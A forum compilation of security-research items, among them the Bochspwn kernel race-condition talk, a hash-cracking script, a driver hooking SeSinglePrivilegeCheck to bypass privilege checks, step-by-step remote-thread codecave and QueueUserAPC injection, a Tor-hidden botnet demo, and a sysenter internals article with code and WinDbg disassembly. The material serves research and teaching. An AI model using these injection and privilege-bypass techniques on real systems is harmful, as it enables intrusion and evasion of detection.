  18. [h=2]SyScan 2013, Bochspwn paper and slides[/h](Collaborative post by Mateusz “j00ru” Jurczyk and Gynvael Coldwind) A few days ago we (Gynvael and I) gave a talk during the SyScan’13 conference in the fine city of Singapore, and as promised (though with a slight delay), today we are publishing both the slide deck and a white paper discussing memory access pattern analysis – a technique we recently employed with success to discover around 50 double-fetch vulnerabilities in Windows kernel and related drivers (Elevation of Privileges and Denial of Service class; see Microsoft Security Bulletins MS13-016, MS13-017, MS13-031 and MS13-036 released in February and April this year. Also, stay tuned for more security patches in May and June). In our SyScan presentation, we explained the concept of kernel race conditions in interacting with user-mode memory, gave a brief rundown on how they can be identified by using CPU-level instrumentation of an operating system session, and later focused on how they can be successfully exploited with the help of several generic techniques (on the example of three Windows vulnerabilities discovered by the Bochspwn project). While we only had the time to go through a single case study (the CVE-2013-1254 vulnerability in win32k!SfnINOUTSTYLECHANGE), both slides and the paper contain a detailed analysis of another local privilege escalation: CVE-2013-1278 in nt!ApphelpCacheLookupEntry, and an amusing case of a double fetch behavior (it is not clear if it can be classified as a bug) found in the default kernel implementation of the standard nt!memcmp function, as a bonus. We hope you will enjoy both the slides and whitepaper – considering the amount of time we have dedicated to the research, we would really appreciate your feedback. 
Download:
Slides: “Bochspwn: Exploiting Kernel Race Conditions Found via Memory Access Patterns” (3.1MB, PDF)
Paper: “Identifying and Exploiting Windows Kernel Race Conditions via Memory Access Patterns” (1.0MB, PDF)

Please note that we are not releasing the Bochspwn project at this time – we are planning to open-source it later this year. On the other hand, the demo videos for the CVE-2013-1254 and CVE-2013-1278 vulnerabilities shown during the talk are now available online:

The SyScan event itself was really fun – the speaker line-up was one of the best ones we have seen this year, ensuring high technical quality of the talks (which were in fact quite inspiring), with nothing lacking on the organizational side. We were also positively surprised by the city-state of Singapore – it’s really a modern, clean and friendly place! We had a great time there and hope to visit it again soon.

Sursa: SyScan 2013, Bochspwn paper and slides | j00ru//vx tech blog
19. [h=2]FindMyHash[/h] Often in penetration tests we discover password hashes. In this situation every penetration tester uses the password cracking tool of his choice (like John the Ripper) in order to crack the hashes offline and to escalate privileges. The sooner the hash cracks, the better for the results of the engagement, as the penetration tester will have more time to search the system for other important things while he has a valid password. For that reason a script was created that allows the penetration tester to crack hashes using free online services or even Google if the hash is common. The usage of the script is very simple and it can be seen below: FindMyHash Script in action This is definitely something that every penetration tester should check before he starts the process of cracking a hash. Author: https://twitter.com/laXmarcaellugar Email: bloglaxmarcaellugar@gmail.com Script: findmyhash - Python script to crack hashes using online services - Google Project Hosting Sursa: FindMyHash | Penetration Testing Lab
20. Visual DuxDebugger is a 64-bit debugger disassembler for Windows, especially useful when source code is unavailable. The user interface is very intuitive, so it makes any reverse engineering task very simple: you can edit code, registers, and memory. Visual DuxDebugger provides wide information about the process being debugged, showing all loaded modules with all exported functions, call stack, threads and much more. The main difference with other debuggers is that Visual DuxDebugger can debug child-processes and multiple-processes.

Software Reverse Engineering is commonly used:
· As a learning tool to understand undocumented APIs.
· As a way to make new compatible products.
· For making software interoperate more effectively.
· To bridge different operating systems or databases.
· To analyze possible spyware / malware.
· To uncover and exploit vulnerabilities.
· To audit software.
· To fix complex bugs.
· For litigation support.

Download: http://www.duxcore.com/index.php/prod/visual-duxdebugger/overview
21. [h=1][Kernel Hack] Hooking SeSinglePrivilegeCheck to bypass privilege checks[/h] [h=3]zwclose7[/h] Recently, I wrote a driver that hooks the SeSinglePrivilegeCheck function. SeSinglePrivilegeCheck is a kernel mode function used to perform privilege checks. Some functions, such as NtLoadDriver and NtShutdownSystem, use the SeSinglePrivilegeCheck function to check for the required privilege. For example, NtLoadDriver will use the SeSinglePrivilegeCheck function to check for the SeLoadDriverPrivilege, and will return STATUS_PRIVILEGE_NOT_HELD if the caller does not have the SeLoadDriverPrivilege enabled. The NtShutdownSystem function also uses the SeSinglePrivilegeCheck function to check for SeShutdownPrivilege, and will return STATUS_PRIVILEGE_NOT_HELD if the caller does not have the SeShutdownPrivilege. Privilege checks are only performed if the caller is from user mode. If the caller is from kernel mode, the system will not perform the privilege checks. My hook driver will hook the SeSinglePrivilegeCheck function to cause the function to always return TRUE to the caller. By hooking the SeSinglePrivilegeCheck function, all privilege checks will be bypassed. In the following video, I will test my hook driver on a virtual machine with Windows XP installed. I will use WinAPIOverride to call the NtShutdownSystem function in the explorer.exe process. The first call failed with STATUS_PRIVILEGE_NOT_HELD because the explorer.exe process does not have the SeShutdownPrivilege enabled. After loading the hook driver, the SeSinglePrivilegeCheck function will be hooked, and all privilege checks will be bypassed. The second NtShutdownSystem call succeeded even though the caller does not have the SeShutdownPrivilege enabled, because the privilege check has been bypassed, and the NtShutdownSystem function successfully shut down the virtual machine.
Download src: http://www.rohitab.com/discuss/index.php?app=core&module=attach&section=attach&attach_id=3889 Sursa: [Kernel Hack] Hooking SeSinglePrivilegeCheck to bypass privilege checks - rohitab.com - Forums
22. [h=1]Calling ShellExecute in codecave[/h][h=3]zwclose7[/h]This program injects into another process a codecave that calls the ShellExecute function to run executable files or open websites.

1) Parse the PID and file name from command line.
2) Enable SeDebugPrivilege using RtlAdjustPrivilege function.
3) Open the target process handle using NtOpenProcess function.
4) Allocate memory in the target process using VirtualAllocEx function.
5) Write the codecave into the target process using NtWriteVirtualMemory function.
6) Create a remote thread in the target process to execute the codecave using RtlCreateUserThread function.
7) Wait for the remote thread to terminate.
8) The codecave calls LoadLibrary function to load shell32.dll, and then calls GetProcAddress function to get the address of the ShellExecute function.
9) The codecave calls ShellExecute function to run the executable file or open a new website.
10) After ShellExecute returns, the codecave calls FreeLibrary function to unload shell32.dll.
11) After FreeLibrary returns, the thread terminates.
12) Close the thread handle using NtClose function.
13) Free the allocated memory using VirtualFreeEx function.
14) Close the process handle using NtClose function.
15) Exit

Native API functions used:
1) RtlAdjustPrivilege
2) NtOpenProcess
3) NtWriteVirtualMemory
4) RtlCreateUserThread
5) NtWaitForSingleObject
6) NtClose

This video shows you how the injector works: http://www.youtube.com/watch?v=vQ0FP2uyJHI&feature=player_embedded

Download src: http://www.rohitab.com/discuss/index.php?app=core&module=attach&section=attach&attach_id=3887 Sursa: Calling ShellExecute in codecave - rohitab.com - Forums
  23. Tor Based Botnets Description: In this video Suriya Prakash shows us a demo on the TOR Based botnet. It is all about POC of TOR botnet. You will learn how to configure and run the TOR based botnet. Blog :- Tor Based Botnets @Defcon Bangalore (DC9180) | Suriya's Blog Security researchers have uncovered a new breed of botnets which rely on the functionality offered by the Tor (The Onion Router) anonymity network. A few days ago, at the DefCon Bangalore security conference – 17-year-old researcher Suriya Prakash presented his findings on how botnets are starting to rely more and more on Tor to hide their traces. “They work like all other botnets, but are hidden behind the TOR network and run as a hidden service with .onion domains (many sites like WikiLeaks have mirror sites in the TOR network, or search engines like duckduckgo, and many other illegal sites that cannot exist in the public internet),” Suriya told Softpedia. “You can set it up just like a normal web server but bind it to the port from which TOR hidden service is running and hence your botnet will run behind the TOR network and it will not be possible to trace the C&C server,” he added. “The bots themselves should have an instance of TOR (because only computers in the TOR network can communicate with hidden services servers) and will communicate over the TOR network to send data and receive commands from the server.” The expert highlighted the fact that such botnets could not be disrupted such as the classic ones by revoking domains, banning IP addresses or by requesting the host to take down the website. News Source : - Researchers Find Botnet C&C Servers Hidden in Tor Anonymity Network Sursa: Tor Based Botnets
24. [h=1]The Sysenter Instruction Internals[/h]Dejan Lukan May 16, 2013

Introduction

In the previous article we’ve seen that whether we’re using the int 0x2e interrupt or sysenter instruction, the same method in kernel is being used. We also identified that the KiSystemService is being called in both cases. In this article, we’ll take a look at the details of how this actually happens. Whenever we use the 0x2e interrupt or a sysenter instruction, the system service number is being used to determine which system call will be invoked. We’ve already seen that the system service number is being passed in an EAX register, which is a 32-bit register on IA-32 machines. However, it isn’t immediately clear how that value is later being used. The first thing that comes to mind is that it’s just an index into some table, which holds the pointers to system routines that will be invoked. This is pretty close to how the value is actually being used, but we should probably mention that 32 bits are not used as an index, because we would have to have a 4 GB table of pointers or a multiple level table, which is impractical and isn’t needed. The system service number is comprised of the following parts:

bits 0-11: the number of the system service to call
bits 12-13: used service descriptor table
bits 14-31: not used

We can see that only the lower 12 bits are used as an index into the table, which is 4096 bytes in size. But there are also 2 bits (from 12-13) that are used to select the appropriate service descriptor table, which means that we can have at most 4 service descriptor tables. In Windows, the SSDT (System Service Dispatch Table) is a table that points to kernel functions that are handled in ntoskrnl.exe. The ntoskrnl.exe is responsible for various tasks, like hardware virtualization, process and memory management, cache managing, process scheduling, etc. [5]

In Windows systems, only two tables are used and they are named KeServiceDescriptorTable and KeServiceDescriptorTableShadow. On the picture below, we can see the address and the first element of both tables in memory. Both of these tables contain SST (System Service Tables) structures that have the following elements (summarized from [4]):

ServiceTable: pointer to the SSDT array of addresses that point to kernel functions
CounterTable: not used
ServiceLimit: number of elements in SSDT array
ArgumentTable: pointer to the array of arguments SSPT (System Service Parameter Table)

The picture below shows the structures of SSTs in both tables:

On the picture above, we can see the first SST of the KeServiceDescriptorTable, which is 16 bytes long. This is the SST that points to the SSDT that contains the Windows core functions. The values of the SST are as follows:

ServiceTable: 80501b8c (pointer to KiServiceTable)
CounterTable: not used
ServiceLimit: 0x11c (hex) = 286 (dec)
ArgumentTable: 80502000 (pointer to KiArgumentTable)

The KeServiceDescriptorTableShadow contains two SSTs which occupy the first 32 bytes. We can see that the first SST is the same as the one present in the KeServiceDescriptorTable table, while the second is used to point to the functions in the win32k.sys kernel driver, which takes care of Windows graphical user interface. Let’s present the fields of this SST:

ServiceTable: bf99e900 (pointer to W32pServiceTable)
CounterTable: not used
ServiceLimit: 0x29b (hex) = 667 (dec)
ArgumentTable: bf99f610 (pointer to W32pArgumentTable)

Let’s summarize what we’ve just done. The KeServiceDescriptorTable table is referenced if bits 12-13 in the system service number are set to 0x00, while the KeServiceDescriptorTableShadow is referenced if bits 12-13 are set to 0x01. The other two values 0x10 and 0x11 are currently not being used.
This means that the value in the EAX register, which is the system service number, can hold the following values (presenting the 16-bit values):

0000xxxx xxxxxxxx: used by KeServiceDescriptorTable, where the x’s can be 0 or 1, which further implies that the first table is used if the system service numbers are from 0x0 – 0xFFF.
0001yyyy yyyyyyyy: used by KeServiceDescriptorTableShadow, where y’s can be 0 or 1, which further implies that the second table is used if the system service numbers are from 0x1000 – 0x1FFF.

This means that the system service numbers in EAX register can only be in the range of 0x0000 – 0x1FFFF, and all other values are invalid. To dump the Windows core functions from the KiServiceTable table, we can use the Windbg “dps KiServiceTable” command as follows (note that only the first part of the functions is presented): Let’s also dump the first part of the functions contained in the W32pServiceTable table. This can be seen below, where we used the “dps W32pServiceTable” command to display the functions: Did you notice that the KiServiceTable contains core Windows functions, while the W32pServiceTable table contains the graphical functions as we already mentioned? The above outputs confirm that.

Presenting the Example

Below we can see the example we’ll be using in this part of the article. The example is simply calling the ZwQuerySystemInformation function directly from the ntdll.dll library. We can’t call the function directly, which is why we must first load the ntdll.dll library and then get the address of the ZwQuerySystemInformation function. We get back the address in memory where the function is located, so we must apply the function prototype in order to be able to call the function. What the program actually does is detect whether the system debugger is currently debugging the operating system or not.
#include "stdafx.h"
#include <stdio.h>
#include <windows.h>
#include <Winternl.h>

int _tmain(int argc, _TCHAR* argv[])
{
    __asm { int 3 }

    typedef long NTSTATUS;
    #define STATUS_SUCCESS ((NTSTATUS)0L)

    HANDLE hProcess = GetCurrentProcess();

    typedef struct _SYSTEM_KERNEL_DEBUGGER_INFORMATION {
        BOOLEAN DebuggerEnabled;
        BOOLEAN DebuggerNotPresent;
    } SYSTEM_KERNEL_DEBUGGER_INFORMATION, *PSYSTEM_KERNEL_DEBUGGER_INFORMATION;

    enum SYSTEM_INFORMATION_CLASS { SystemKernelDebuggerInformation = 35 };

    typedef NTSTATUS (__stdcall *ZW_QUERY_SYSTEM_INFORMATION)(
        IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
        IN OUT PVOID SystemInformation,
        IN ULONG SystemInformationLength,
        OUT PULONG ReturnLength);

    ZW_QUERY_SYSTEM_INFORMATION ZwQuerySystemInformation;
    SYSTEM_KERNEL_DEBUGGER_INFORMATION Info;

    /* load the ntdll.dll */
    HMODULE hModule = LoadLibrary(_T("ntdll.dll"));
    ZwQuerySystemInformation = (ZW_QUERY_SYSTEM_INFORMATION)GetProcAddress(hModule, "ZwQuerySystemInformation");
    if (ZwQuerySystemInformation == NULL) {
        printf("Error: could not find the function ZwQuerySystemInformation in library ntdll.dll.");
        exit(-1);
    }
    printf("ZwQuerySystemInformation is located at 0x%08x in ntdll.dll.\n", (unsigned int)ZwQuerySystemInformation);

    if (STATUS_SUCCESS == ZwQuerySystemInformation(SystemKernelDebuggerInformation, &Info, sizeof(Info), NULL)) {
        if (Info.DebuggerEnabled && !Info.DebuggerNotPresent) {
            printf("System debugger is present.");
        } else {
            printf("System debugger is not present.");
        }
    }

    /* wait */
    getchar();
    return 0;
}

While running the program under Windbg kernel debugger, we’ll be presented with the following output from the program: We can see that the program correctly identified that the system debugger is present.
The picture below presents the disassembled instruction of the ZwQuerySystemInformation function: We can see that the ZwQuerySystemInformation function implementation in ntdll.dll library is just a routine that calls into the kernel and doesn’t actually provide the service itself. In the code above, we’re storing the 0xAD hexadecimal number into the EAX register, the system service number we’ve been talking about in the article. Since the 0xAD number is in range of 0x000-0xFFF, we’re effectively using the KeServiceDescriptorTable table to get all the information that we need to call the kernel function. Let’s first take a look at the address that is loaded into the EDX register: In the code above, we’re reading the address 0x7c90e510 at the memory of the EDX register and calling it. The 0x7c90e510 address is the address of the KiFastSystemCall function as we can see in the output below: The KiFastSystemCall is executing the sysenter instruction, which should call the appropriate system function in the kernel. We already know that when we execute the sysenter instruction, the KiFastCallEntry function is called, which is why we need to set a breakpoint on that function as follows: After that we can run the program with the g command and the function will be hit as shown below: Let’s disassemble the whole KiFastCallEntry function to figure out what the function does.
The disassembled instructions can be seen below:

kd> u KiFastCallEntry l100
nt!KiFastCallEntry:
8053d600 b923000000      mov     ecx,23h
8053d605 6a30            push    30h
8053d607 0fa1            pop     fs
8053d609 8ed9            mov     ds,cx
8053d60b 8ec1            mov     es,cx
8053d60d 8b0d40f0dfff    mov     ecx,dword ptr ds:[0FFDFF040h]
8053d613 8b6104          mov     esp,dword ptr [ecx+4]
8053d616 6a23            push    23h
8053d618 52              push    edx
8053d619 9c              pushfd
8053d61a 6a02            push    2
8053d61c 83c208          add     edx,8
8053d61f 9d              popfd
8053d620 804c240102      or      byte ptr [esp+1],2
8053d625 6a1b            push    1Bh
8053d627 ff350403dfff    push    dword ptr ds:[0FFDF0304h]
8053d62d 6a00            push    0
8053d62f 55              push    ebp
8053d630 53              push    ebx
8053d631 56              push    esi
8053d632 57              push    edi
8053d633 8b1d1cf0dfff    mov     ebx,dword ptr ds:[0FFDFF01Ch]
8053d639 6a3b            push    3Bh
8053d63b 8bb324010000    mov     esi,dword ptr [ebx+124h]
8053d641 ff33            push    dword ptr [ebx]
8053d643 c703ffffffff    mov     dword ptr [ebx],0FFFFFFFFh
8053d649 8b6e18          mov     ebp,dword ptr [esi+18h]
8053d64c 6a01            push    1
8053d64e 83ec48          sub     esp,48h
8053d651 81ed9c020000    sub     ebp,29Ch
8053d657 c6864001000001  mov     byte ptr [esi+140h],1
8053d65e 3bec            cmp     ebp,esp
8053d660 759a            jne     nt!KiFastCallEntry2+0x47 (8053d5fc)
8053d662 83652c00        and     dword ptr [ebp+2Ch],0
8053d666 462cff          test    byte ptr [esi+2Ch],0FFh
8053d66a 89ae34010000    mov     dword ptr [esi+134h],ebp
8053d670 0f854afeffff    jne     nt!Dr_FastCallDrSave (8053d4c0)
8053d676 8b5d60          mov     ebx,dword ptr [ebp+60h]
8053d679 8b7d68          mov     edi,dword ptr [ebp+68h]
8053d67c 89550c          mov     dword ptr [ebp+0Ch],edx
8053d67f c74508000ddbba  mov     dword ptr [ebp+8],0BADB0D00h
8053d686 895d00          mov     dword ptr [ebp],ebx
8053d689 897d04          mov     dword ptr [ebp+4],edi
8053d68c fb              sti
8053d68d 8bf8            mov     edi,eax
8053d68f c1ef08          shr     edi,8
8053d692 83e730          and     edi,30h
8053d695 8bcf            mov     ecx,edi
8053d697 03bee0000000    add     edi,dword ptr [esi+0E0h]
8053d69d 8bd8            mov     ebx,eax
8053d69f 25ff0f0000      and     eax,0FFFh
8053d6a4 3b4708          cmp     eax,dword ptr [edi+8]
8053d6a7 0f8345fdffff    jae     nt!KiBBTUnexpectedRange (8053d3f2)
8053d6ad 83f910          cmp     ecx,10h
8053d6b0 751a            jne     nt!KiFastCallEntry+0xcc (8053d6cc)
8053d6b2 8b0d18f0dfff    mov     ecx,dword ptr ds:[0FFDFF018h]
8053d6b8 33db            xor     ebx,ebx
8053d6ba 0b99700f0000    or      ebx,dword ptr [ecx+0F70h]
8053d6c0 740a            je      nt!KiFastCallEntry+0xcc (8053d6cc)
8053d6c2 52              push    edx
8053d6c3 50              push    eax
8053d6c4 ff15e4305580    call    dword ptr [nt!KeGdiFlushUserBatch (805530e4)]
8053d6ca 58              pop     eax
8053d6cb 5a              pop     edx
8053d6cc ff0538f6dfff    inc     dword ptr ds:[0FFDFF638h]
8053d6d2 8bf2            mov     esi,edx
8053d6d4 8b5f0c          mov     ebx,dword ptr [edi+0Ch]
8053d6d7 33c9            xor     ecx,ecx
8053d6d9 8a0c18          mov     cl,byte ptr [eax+ebx]
8053d6dc 8b3f            mov     edi,dword ptr [edi]
8053d6de 8b1c87          mov     ebx,dword ptr [edi+eax*4]
8053d6e1 2be1            sub     esp,ecx
8053d6e3 c1e902          shr     ecx,2
8053d6e6 8bfc            mov     edi,esp
8053d6e8 3b35d48a5580    cmp     esi,dword ptr [nt!MmUserProbeAddress (80558ad4)]
8053d6ee 0f83a8010000    jae     nt!KiSystemCallExit2+0x9f (8053d89c)
8053d6f4 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
8053d6f6 ffd3            call    ebx
8053d6f8 8be5            mov     esp,ebp
8053d6fa 8b0d24f1dfff    mov     ecx,dword ptr ds:[0FFDFF124h]
8053d700 8b553c          mov     edx,dword ptr [ebp+3Ch]
8053d703 899134010000    mov     dword ptr [ecx+134h],edx

Let’s take a look at the first instruction in the KiFastCallEntry function where the value in register EAX is being used, which means that the system service number is being used to do something. Those instructions can be seen below:

8053d68d 8bf8            mov     edi,eax
8053d68f c1ef08          shr     edi,8
8053d692 83e730          and     edi,30h
8053d695 8bcf            mov     ecx,edi

At first, those instructions may seem weird, but they soon start to make a lot of sense. All of the operations can be seen on the picture below. We start with a whole system service number that is stored in the EAX register and then moved to the EDI register. This can be seen on the first part of the picture where the lower 12 bits is the actual system service number and the middle two bits determine the SSDT table to be used, while the upper 18 bits are not used.
The shr instruction moves all the bits in the EDI register to the right by 8. This is seen on the middle part of the picture where the lower 4 bits are used to represent the now-corrupted system service number, and the middle two bits are still the SSDT number. The upper 26 bits are not used. The next and instruction nulls the lower four bits, thus leaving only the middle two bits unaltered. At the end of the above code, the SSDT number is stored in the 4-5 bit of the ECX register. Since we’re passing the system service number 0xAD in the EAX register, we should really set a conditional breakpoint in WinDbg, because otherwise we won’t be able to manage the execution the way we want. This is because the KiFastCallEntry function is called so many times by the kernel itself that it doesn’t make sense to manually check whether the EAX register contains the right system service number. We should set the conditional breakpoint on the 0x8053d68d address and check whether the value in the EAX register is 0xAD (our system service number). We can set the conditional breakpoint like this:

kd> bp 8053d68d "j @eax = 0x000000ad '';'gc'"
kd> bl
 0 e 8053d68d     0001 (0001) nt!KiFastCallEntry+0x8d "j @eax = 0x000000ad '';'gc'"

After that we should start the program normally and observe what happens. The execution should take considerably more time, since WinDbg must compare the value in the EAX register every time it passes that code point, which happens a lot.
Let’s take a look at an example at a point where it hits the breakpoint, which means that the value in the EAX register should be set to 0xAD:

kd> g
nt!KiFastCallEntry+0x8d:
8053d6dd 8bf8            mov     edi,eax
kd> r eax, ecx, edi
eax=000000ad ecx=80042000 edi=7c90e514
kd> p
nt!KiFastCallEntry+0x8f:
8053d6df c1ef08          shr     edi,8
kd> r eax, ecx, edi
eax=000000ad ecx=80042000 edi=000000ad
kd> p
nt!KiFastCallEntry+0x92:
8053d6e2 83e730          and     edi,30h
kd> r eax, ecx, edi
eax=000000ad ecx=80042000 edi=00000000
kd> p
nt!KiFastCallEntry+0x95:
8053d6e5 8bcf            mov     ecx,edi

The first number in EAX register is 0xad (10101101), which we’re shifting to the right for 8 bits. This makes a number 0x0, which is then later AND-ed with the 0x30. The transformations result in the number 0x000000. Since we’ve just calculated the value stored in the ECX register, it’s advisable that we continue the code observation by looking at the instructions that use the value in the ECX register. We won’t do that now since the article might get too long, but you get the picture.

Conclusion

In this article we’ve seen the internals of what happens when the sysenter instruction is called. We could go a lot deeper, but I didn’t want to make the article too long. The most important things to remember are how the system service number is calculated and how the service is called.

References:
[1] Shifting yourself to space, accessible at sysenter | Shifting yourself to space.
[2] Manual inspection of service dispatch table (SSDT) for hook detection, accessible at DDK / Windbg / IDA Pro: Manual inspection of service dispatch table (SSDT) for hook detection.
[3] Hunting rootkits with Windbg, accessible at www.reconstructer.org/…/Hunting%20rootkits%20with%20Windbg.pdf.
[4] BlackEnergy Version 2 Rootkit Analysis – SecuraBit, accessible at www.securabit.com/wp…/Rootkit-Analysis-Hiding-SSDT-Hooks1.pdf.
[5] ntoskrnl.exe, accessible at ntoskrnl.exe - Wikipedia, the free encyclopedia.
Sursa: InfoSec Institute Resources – The Sysenter Instruction Internals
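As an added example (not part of the article above), here is a small Python model of the dispatch the article walks through: it splits the system service number the way KiFastCallEntry's shr/and sequence does, selects the SST, applies the ServiceLimit check and computes where the handler pointer lives. The two descriptor tables are constructed from the WinDbg values quoted in the article, and the 16-byte SST layout is taken from its description; which descriptor table a thread uses is passed in explicitly rather than read from the thread as the kernel does.

```python
from collections import namedtuple

# System Service Table entry as described in the article (16 bytes in memory).
SST = namedtuple("SST", "ServiceTable CounterTable ServiceLimit ArgumentTable")
SST_SIZE = 16

# Constructed models of the two descriptor tables, using the values the
# article reads from WinDbg. Each list index corresponds to one 16-byte SST.
KE_SERVICE_DESCRIPTOR_TABLE = [
    SST(0x80501B8C, 0, 0x11C, 0x80502000),   # KiServiceTable / KiArgumentTable
]
KE_SERVICE_DESCRIPTOR_TABLE_SHADOW = [
    SST(0x80501B8C, 0, 0x11C, 0x80502000),   # same core table as above
    SST(0xBF99E900, 0, 0x29B, 0xBF99F610),   # W32pServiceTable / W32pArgumentTable
]


def split_service_number(eax):
    """Bits 0-11 are the service index, bits 12-13 pick the SST, the rest is ignored."""
    return (eax >> 12) & 0x3, eax & 0xFFF


def sst_offset_like_kernel(eax):
    """Replicates 'mov edi,eax / shr edi,8 / and edi,30h': the two selector
    bits land in bits 4-5, i.e. already multiplied by the 16-byte SST size."""
    return (eax >> 8) & 0x30


def resolve_service(eax, descriptor_table):
    """Walk the dispatch the way KiFastCallEntry does and return
    (sst_index, service_index, address_of_handler_pointer).

    descriptor_table is the list the thread's ServiceTable pointer refers to
    (the shadow table for GUI threads, the plain one otherwise). Raises
    IndexError for a selector with no SST behind it, or for a service index
    that is >= ServiceLimit (the 'cmp eax,[edi+8] / jae KiBBTUnexpectedRange'
    check in the listing).
    """
    offset = sst_offset_like_kernel(eax)
    sst_index = offset // SST_SIZE
    # Same selector computed the straightforward way; the two must agree.
    assert sst_index == split_service_number(eax)[0]
    if sst_index >= len(descriptor_table):
        raise IndexError("no SST at offset 0x%x in this descriptor table" % offset)
    sst = descriptor_table[sst_index]
    service_index = eax & 0xFFF                       # 'and eax,0FFFh'
    if service_index >= sst.ServiceLimit:
        raise IndexError("service %#x >= ServiceLimit %#x" % (service_index, sst.ServiceLimit))
    # 'mov ebx,dword ptr [edi+eax*4]': the handler pointer sits 4*index into ServiceTable.
    return sst_index, service_index, sst.ServiceTable + 4 * service_index


if __name__ == "__main__":
    tables = (("KeServiceDescriptorTable", KE_SERVICE_DESCRIPTOR_TABLE),
              ("KeServiceDescriptorTableShadow", KE_SERVICE_DESCRIPTOR_TABLE_SHADOW))
    for eax in (0xAD, 0x1005, 0x1300, 0x2000):       # 0xAD is the article's ZwQuerySystemInformation
        for name, table in tables:
            try:
                print("%#06x via %s -> SST %d, index %#x, slot %#010x"
                      % ((eax, name) + resolve_service(eax, table)))
            except IndexError as exc:
                print("%#06x via %s -> rejected: %s" % (eax, name, exc))
```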
25. [h=1]Code Injection Techniques[/h]ViperEye May 02, 2013

DLL Injection using QueueUserAPC

We begin by creating a process using CreateProcess, which is where we are trying to inject the code into:

PROCESS_INFORMATION pi;
STARTUPINFOA Startup;
ZeroMemory(&Startup, sizeof(Startup));
ZeroMemory(&pi, sizeof(pi));
CreateProcessA("C:\\Windows\\notepad.exe", NULL, NULL, NULL, NULL, CREATE_SUSPENDED, NULL, NULL, &Startup, &pi);

Once the process is created, OpenProcess is called with the following arguments:

OpenProcess(PROCESS_ALL_ACCESS, FALSE, /*ProcessId*/ 348);

Once the process is opened with all access, memory can be allocated to it using VirtualAllocEx().

FULL ARTICLE: http://resources.infosecinstitute.com/code-injection-techniques/